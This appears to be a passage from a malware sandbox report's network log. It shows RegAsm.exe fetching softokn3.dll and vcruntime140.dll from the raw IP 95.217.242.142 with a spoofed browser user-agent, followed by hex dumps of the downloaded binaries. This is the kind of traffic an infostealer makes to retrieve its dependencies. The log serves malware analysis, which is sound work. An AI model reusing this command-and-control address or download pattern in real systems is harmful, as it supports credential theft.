2024-04-29 20:13:26 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-04-29 20:13:26 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-04-29 20:13:26 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-04-29 20:13:26 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-04-29 20:13:26 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49769	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:28 UTC	222	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Cache-Control: no-cache
2024-04-29 20:13:29 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:28 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-04-29 20:13:29 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-04-29 20:13:29 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-04-29 20:13:29 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-04-29 20:13:29 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-04-29 20:13:29 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-04-29 20:13:29 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-04-29 20:13:29 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-04-29 20:13:29 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-04-29 20:13:29 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-04-29 20:13:29 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49770	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:30 UTC	226	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Cache-Control: no-cache
2024-04-29 20:13:31 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:30 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
2024-04-29 20:13:31 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-04-29 20:13:31 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-04-29 20:13:31 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-04-29 20:13:31 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-04-29 20:13:31 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49771	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
